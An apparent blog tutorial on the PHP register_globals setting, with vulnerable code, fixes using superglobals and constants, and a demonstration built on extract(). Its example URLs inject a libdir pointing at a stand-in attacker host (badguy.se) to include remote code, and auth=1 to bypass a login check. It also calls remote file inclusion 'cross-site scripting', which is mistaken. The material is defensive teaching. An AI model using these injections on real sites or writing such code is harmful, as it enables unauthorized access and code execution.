PHP Security: register_globals

russianmiserable, Security

13 Jun 2012

How To Make It Difficult For Hackers To Set Variables

What Is register_globals?

A directive in php.ini that automatically makes variables out of environment, GET, POST, cookie, and server data (true/false)

Cf. variables_order (EGPCS)

Examples (Part 1)

<form …>
  <input type="text" name="mytext" />
  <input type="hidden" name="myhide" value="other" />
</form>

With register_globals turned on, PHP will automatically create variables $mytext and $myhide and populate them with the values entered in the form (whether GET or POST).

Examples (Part 2)

Similarly, with the URL…

http://example.com/index.php?george=jungle

…PHP will create $george for you and give it the value “jungle”.

Cookie, server, and environment variables such as $DOCUMENT_ROOT and $PHP_SELF are also automatically created and populated.

You don’t know where the values came from (EGPCS).

Problems (Part 1)

<?php
// …some code…

include "$libdir/functions.inc";

// …more code…
?>

If a user sets $libdir in the URL, it can override your $libdir value, allowing cross-site scripting. E.g.:

http://example.com/index.php?libdir=http://badguy.se/hack

Problems (Part 2)

<?php
if ($auth == 1) {
    // do stuff for authorized users
} else {
    echo "Not authorized!";
}
?>

If a user sets $auth in the URL, it can override your $auth value, allowing unauthenticated use. E.g.:

http://example.com/index.php?auth=1

Solutions (Part 1)


Don’t let anyone see your code
  If they don’t know what variables to set, they can’t crack your script!
  Security-through-obscurity
  Does not work well, if at all

Check all variables before using them
  Good practice anyway
  Sometimes hard to check (e.g., $auth)

Solutions (Part 2)


Turn off register_globals!
  Off by default in PHP 4.2.0 and later anyway

Use the track_vars arrays instead:
  $_GET
  $_POST
  $_SERVER
  $_FILES
  $_ENV
  $_COOKIE

Turned on by default in PHP 4.0.3 and later

Solution Examples (Part 1)

<form method="post">
  <input type="text" name="mytext" />
  <input type="hidden" name="myhide" value="other" />
</form>

With register_globals turned off, PHP will populate $_POST['mytext'] and $_POST['myhide'].

If the method was GET, the values are in $_GET[].

Solution Examples (Part 2)

If a value is set in the URL…

http://example.com/index.php?george=jungle

…it becomes $_GET['george'] = "jungle"

Post-method variables are in $_POST
Get-method and URL variables are in $_GET
Server variables are in $_SERVER
Uploaded files are in $_FILES
Cookie values in $_COOKIE
Environment settings in $_ENV

You know exactly where values are set from.

Use define For Path Names

If you have to set directory paths in variables, use constants instead

define('LIBDIR', '/path/to/lib');

Pathnames are especially dangerous in variables since they can lead directly to cross-site scripting security issues

Once set, constants cannot be redefined, making them far more secure against accidental or unexpected value resets and hack attempts
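The two problems above and their fixes, side by side, as an added example that is not part of the original slides. register_globals was removed in PHP 5.4, so the "before" function reproduces its effect with extract(); the function names, the $session array standing in for server-side login state, the input pattern, and the sample request are assumptions made for illustration.

```php
<?php
// Added example, not from the original slides. Run from the CLI on PHP 7 or later.

define('LIBDIR', '/path/to/lib');   // constant from the slides: cannot be reassigned

// Constructed request: what PHP would receive for
// index.php?auth=1&libdir=http://badguy.se/hack&george=jungle
$request = ['auth' => '1', 'libdir' => 'http://badguy.se/hack', 'george' => 'jungle'];

// "Before": request data lands in the same namespace as the script's own variables.
function with_register_globals(array $get): array
{
    $libdir = '/path/to/lib';   // the value the script intended
    extract($get);              // stand-in for register_globals=On (overwrites by default)
    // The script never assigned $auth, yet the request created it.
    return [
        'auth'    => isset($auth) && $auth == 1,
        'include' => "$libdir/functions.inc",   // path is only reported, never included
    ];
}

// "After": each value is read from a named source, and the authorization
// decision uses server-side state only (hypothetical $session array).
function with_superglobals(array $get, array $session): array
{
    $auth   = isset($session['auth']) && $session['auth'] === true;
    $george = isset($get['george']) && preg_match('/^[a-z]{1,32}$/', $get['george'])
        ? $get['george']
        : null;                 // checked before use; anything unexpected is dropped
    return [
        'auth'    => $auth,
        'include' => LIBDIR . '/functions.inc',
        'george'  => $george,
    ];
}

$before = with_register_globals($request);
$after  = with_superglobals($request, []);   // empty session: nobody has logged in

printf("register_globals on : auth=%s include=%s\n",
    var_export($before['auth'], true), $before['include']);
printf("register_globals off: auth=%s include=%s george=%s\n",
    var_export($after['auth'], true), $after['include'], var_export($after['george'], true));
```

A call to extract() on request data in current code recreates the same exposure, so it is worth searching a codebase for.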
